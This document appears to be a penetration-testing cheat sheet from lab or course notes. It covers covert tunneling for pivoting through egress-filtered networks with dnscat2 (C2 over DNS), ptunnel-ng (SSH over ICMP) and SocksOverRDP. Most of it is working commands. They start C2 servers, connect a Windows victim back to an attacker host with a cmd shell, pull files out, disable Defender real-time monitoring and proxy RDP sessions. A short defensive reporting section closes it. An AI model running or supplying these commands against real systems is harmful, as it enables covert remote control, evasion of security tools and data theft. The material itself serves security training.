🛡️ Methodology Checklist
- Identify which protocols are allowed outbound from pivot
- DNS tunnel (dnscat2): start server on attacker, deploy client on pivot
- ICMP tunnel (ptunnel): start ptunnel server, connect from pivot
- HTTP tunnel (rpivot): start server on attacker, run client on pivot
- Verify tunnel connectivity with a simple test request
- Monitor for latency indicating indirect routing
- Teardown all tunnel processes on exit
🎯 Operational Context
Use when: Egress is severely restricted (only DNS or ICMP allowed out) — use protocol-specific tunnels to establish C2 channel through non-standard protocols.
Think Dumber First: DNS tunneling: dnscat2 server on your VPS → dnscat2 --dns server=[ATTACKER],port=53,domain=[DOMAIN] on target. Works through most corporate firewalls that allow DNS to external resolvers.
Skip when: HTTP/HTTPS egress is available — DNS/ICMP tunnels are 10-100x slower than HTTP tunnels.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo ruby dnscat2.rb --dns host=[LHOST],port=53,domain=[DOMAIN] --no-cache | Dnscat2 — start C2 server (note the secret= in output) |
Import-Module .\dnscat2.ps1 | Load dnscat2 PowerShell client on victim |
Start-Dnscat2 -DNSserver [LHOST] -Domain [DOMAIN] -PreSharedSecret [SECRET] -Exec cmd | Connect victim back to dnscat2 server |
dnscat2> window -i 1 | Interact with session 1 |
dnscat2> shell | Spawn new cmd shell window |
exec "type C:\\Users\\Administrator\\flag.txt" | Execute single command in dnscat2 |
download C:\\path\\to\\file /local/path | Download file via dnscat2 (most stable) |
sudo rsync -av --exclude='.git' /opt/ptunnel-ng/ [USER]@[PIVOT_IP]:~/ptunnel-ng/ | Transfer ptunnel-ng source to pivot for compilation |
touch configure src/config.h.in Makefile.in && sudo ./configure && sudo make | Compile ptunnel-ng on pivot (fix timestamp errors first) |
sudo ./ptunnel-ng -v | Start ptunnel-ng server on pivot host |
sudo ./ptunnel-ng -p[PIVOT_IP] -l 2222 -r[PIVOT_IP] -R 22 -v | ptunnel-ng client — map ICMP to SSH on local:2222 |
ssh -p 2222 ubuntu@127.0.0.1 | SSH through ICMP tunnel |
ssh -D 9050 -p 2222 ubuntu@127.0.0.1 | SOCKS proxy through ICMP tunnel |
regsvr32.exe SocksOverRDP-Plugin.dll | Register SocksOverRDP DLL on Windows jump host |
netstat -an | findstr 1080 | Verify SocksOverRDP SOCKS listener is active |
🔬 Deep Dive & Workflow
When to Use Each
| Tool | Protocol | Use Case |
|---|---|---|
| Dnscat2 | DNS TXT | Firewall blocks TCP/HTTPS but allows DNS; stealthy C2 |
| ptunnel-ng | ICMP (ping) | All TCP/UDP blocked but ping passes through |
| SocksOverRDP | RDP DVC | Windows-only, no SSH, only RDP allowed to jump host |
Dnscat2 — C2 over DNS
Encodes C2 traffic inside DNS TXT queries. Useful when only DNS egress is allowed (common in locked-down corporate environments).
Server setup (Kali):
cd dnscat2/server/
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
# Note the "secret=..." line in output — required for clientClient setup (Windows victim — run as Administrator):
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04... -Exec cmdInteracting with sessions:
dnscat2> windows # list sessions
dnscat2> window -i 1 # enter session
dnscat2> shell # spawn new cmd (creates window 2)
dnscat2> window -i 2 # switch to shell
exec "type C:\\Users\\Administrator\\flag.txt" # single command
download C:\\path\\to\\file /tmp/file # file transfer (most stable)Always use double backslashes in Windows paths inside dnscat2. Run PS as Administrator to avoid Failed to ConvertTo-Dnscat2Packet errors.
ptunnel-ng — SSH/SOCKS over ICMP
Wraps TCP traffic (SSH) inside ICMP echo request/reply packets. Requires sudo (raw packet construction).
Architecture mismatch warning: If attacking from ARM (Apple Silicon), cannot compile locally and transfer. Must “prep local, compile remote”:
# Attack host: prep source
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng
sudo ./autogen.sh
sudo make clean # remove local binaries before transfer
# Transfer source to pivot
sudo rsync -av --exclude='.git' /opt/ptunnel-ng/ ubuntu@10.129.202.64:~/ptunnel-ng/
# Pivot host: compile natively
ssh ubuntu@10.129.202.64
cd ~/ptunnel-ng
touch configure src/config.h.in Makefile.in # fix timestamp errors
sudo ./configure && sudo make
# Attack host: also compile locally
cd /opt/ptunnel-ng
sudo ./configure && sudo makeEstablish ICMP tunnel:
# On pivot host (server)
sudo ./src/ptunnel-ng -v
# On attack host (client) — map local:2222 to pivot:22 via ICMP
sudo ./ptunnel-ng -p10.129.202.64 -l 2222 -r10.129.202.64 -R 22 -v
# Use tunnel
ssh -p 2222 ubuntu@127.0.0.1 # direct SSH login
ssh -D 9050 -p 2222 ubuntu@127.0.0.1 # SOCKS proxy through ICMP
proxychains xfreerdp3 /v:172.16.5.19 /u:victor /p:pass@123 # RDP via ICMPSocksOverRDP — SOCKS over RDP Dynamic Virtual Channels
Windows-only. Uses RDP’s built-in DVC mechanism to create a SOCKS proxy over an existing RDP session.
Architecture: Attack Host → Jump Host (Win10) → RDP → Pivot Host (Win) → Target
# 1. On Jump Host: disable Defender, register DLL
Set-MpPreference -DisableRealtimeMonitoring $true
regsvr32.exe SocksOverRDP-Plugin.dll # must see "DllRegisterServer succeeded" popup
# 2. RDP into Pivot Host via mstsc.exe
# Popup appears: "SocksOverRDP plugin enabled, listening on 127.0.0.1:1080"
# 3. On Pivot Host (inside RDP session): run server
# Transfer SocksOverRDP-Server.exe and run as Administrator
# 4. Verify listener on Jump Host
netstat -an | findstr 1080 # TCP 127.0.0.1:1080 LISTENING
# 5. Configure Proxifier on Jump Host
# Profile → Proxy Servers: 127.0.0.1:1080 SOCKS5
# Profile → Rules: Default → Proxy SOCKS5
# 6. Double-pivot via new mstsc window to final target
# CRITICAL: Set Experience → Modem (56 kbps) to prevent "Encryption Error"“Encryption Error” fix: High-quality RDP settings cause handshake failure when tunneled over RDP. Always set Experience to Modem (56 kbps) for RDP-over-RDP connections.
If DLL disappears: Windows Defender quarantined it. Add folder exclusion before extracting.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| dnscat2 connection very slow | DNS propagation latency | DNS tunneling ~1-3KB/s is normal; only suitable for shell/C2 not file transfer |
| DNS tunnel fails | External DNS resolver blocked | Target DNS must resolve to your server; check egress: nslookup [DOMAIN] [EXTERNAL_RESOLVER] |
| ICMP tunnel blocked | ICMP rate-limited | Increase delay: ptunnel -p [ATTACKER] -lp [LPORT] -da [DEST] -dp [DPORT] -x [PASS]; reduce packet rate |
| dnscat2 domain not working | DNS not delegated to your server | Requires NS record pointing to your server; use a registered domain with proper delegation |
| ptunnel requires root | Needs raw socket access | ICMP requires root on both client and server; confirm root access on both sides |
📝 Reporting Trigger
Finding Title: C2 Channel Established via DNS Tunneling Through Egress-Filtered Network Impact: DNS tunneling bypasses egress filtering that blocks HTTP/HTTPS by encoding C2 traffic as DNS queries, maintaining attacker access through firewalls that allow DNS to external resolvers. Root Cause: DNS egress to external resolvers permitted without monitoring for DNS tunneling patterns (high-frequency queries, long subdomains, unusual query types). Recommendation: Implement DNS monitoring for tunneling indicators (high query rates, long subdomain strings, unusual TXT record queries). Force all DNS through an internal resolver and log all DNS queries. Block direct DNS to external resolvers from workloads.